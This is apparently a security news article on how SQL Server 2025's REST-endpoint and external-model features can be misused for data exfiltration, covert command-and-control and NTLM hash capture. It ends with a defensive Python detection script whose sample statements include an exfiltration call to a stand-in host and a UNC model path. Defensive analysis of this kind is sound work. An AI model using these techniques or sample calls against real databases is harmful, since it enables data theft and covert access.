Microsoft’s SQL Server 2025 introduces advanced AI capabilities designed to enhance data processing and integration. However, these features have inadvertently opened new avenues for cyber attackers to exfiltrate sensitive data and establish covert command-and-control (C2) channels directly from the database engine.
Security researchers have identified that the stored procedure sp_invoke_external_rest_endpoint allows SQL Server to send HTTPS requests to external endpoints without relying on traditional methods like xp_cmdshell or PowerShell. While intended for legitimate API communications, this function can be misused by attackers to transmit large datasets, such as user credentials or entire database records, over encrypted channels. The procedure supports payloads up to 100 MB, facilitating efficient data exfiltration.
In a demonstrated attack scenario, an attacker with sysadmin privileges on a compromised SQL Server instance can query sensitive tables, convert the data to JSON format, and transmit it to an attacker-controlled server using sp_invoke_external_rest_endpoint. Because the traffic originates from the database engine and uses HTTPS, it can evade traditional monitoring tools that typically detect suspicious command executions or unusual outbound connections.
Another significant feature, CREATE EXTERNAL MODEL, enables SQL Server to integrate with external AI models. This is complemented by AI_GENERATE_EMBEDDINGS, which sends data to these models and receives structured responses. While these functions are designed for AI-driven applications, researchers have demonstrated that they can be exploited to establish covert communication channels. Attackers can encode commands and responses within AI embedding data, making the traffic appear legitimate and difficult to detect. This technique allows for a new form of C2 infrastructure operating entirely within SQL queries.
By combining external model calls with periodic check-ins, attackers can create persistent backdoors that execute commands and return results without deploying traditional malware. In more advanced scenarios, malicious .NET CLR assemblies can be loaded directly into SQL Server memory, eliminating the need for disk-based payloads and further reducing detection risk.
Additionally, researchers have highlighted a technique involving UNC paths in AI model configurations, which can trigger NTLM authentication attempts over SMB and so allow attackers to capture or relay authentication hashes within a network. Although the behavior was reported to Microsoft, it was not classified as a security vulnerability and remains unaddressed.
These findings underscore the dual-use nature of advanced features in enterprise software. While AI integrations in SQL Server 2025 offer significant benefits for data processing and application development, they also introduce potential security risks if not properly managed. Organizations must implement robust monitoring and access controls to prevent the misuse of these features. Regular audits and updates to security protocols are essential to mitigate the risks associated with these advanced capabilities.
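A triage sketch for the monitoring described above, added here as an example and not taken from the researchers or from Microsoft: it scans captured T-SQL statement text for the three features this article discusses and flags REST endpoints or model locations outside an allowlist, including UNC paths. The allowlist, the scan and classify helpers, and every host and object name in the sample are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this instance is approved to call; replace with your own.
ALLOWED_HOSTS = {"api.internal.example"}

FLAGS = re.I | re.S
REST_URL = re.compile(r"sp_invoke_external_rest_endpoint\b.*?@url\s*=\s*N?'([^']+)'", FLAGS)
MODEL = re.compile(r"CREATE\s+EXTERNAL\s+MODEL\s+\[?(\w+)\]?.*?LOCATION\s*=\s*N?'([^']+)'", FLAGS)
EMBED = re.compile(r"AI_GENERATE_EMBEDDINGS\s*\(.*?USE\s+MODEL\s+\[?(\w+)\]?", FLAGS)

def classify(target):
    """Return a reason if the URL or LOCATION value is suspicious, else None."""
    if target.startswith("\\\\"):
        return "UNC path (SMB/NTLM authentication attempt)"
    host = (urlsplit(target).hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return f"host not on allowlist: {host or target}"
    return None

def scan(statements):
    """Scan statement text in capture order; return (index, rule, detail) tuples."""
    findings, flagged_models = [], {}
    for i, sql in enumerate(statements):
        for m in REST_URL.finditer(sql):
            if reason := classify(m.group(1)):
                findings.append((i, "rest_endpoint", reason))
        for m in MODEL.finditer(sql):
            if reason := classify(m.group(2)):
                flagged_models[m.group(1).lower()] = reason
                findings.append((i, "external_model", reason))
        for m in EMBED.finditer(sql):
            # Embedding calls matter when they go through a model already flagged.
            if (name := m.group(1).lower()) in flagged_models:
                findings.append((i, "embeddings_call", f"uses flagged model {name}"))
    return findings

# Constructed, abbreviated sample statements; object names and hosts are made up.
SAMPLE = [
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://api.internal.example/v1/score', @method = 'POST', @payload = @body;",
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://collector.example.net/in', @method = 'POST', @payload = @rows;",
    "CREATE EXTERNAL MODEL EmbedA WITH (LOCATION = 'https://models.example.org/embed', MODEL_TYPE = EMBEDDINGS);",
    r"CREATE EXTERNAL MODEL EmbedB WITH (LOCATION = '\\fs01.example\share\model', MODEL_TYPE = EMBEDDINGS);",
    "SELECT AI_GENERATE_EMBEDDINGS(note USE MODEL EmbedA) FROM dbo.Notes;",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Statements that build the URL or LOCATION from variables will not match these literal patterns, so the scan is a triage aid to use alongside network egress controls, not a replacement for them.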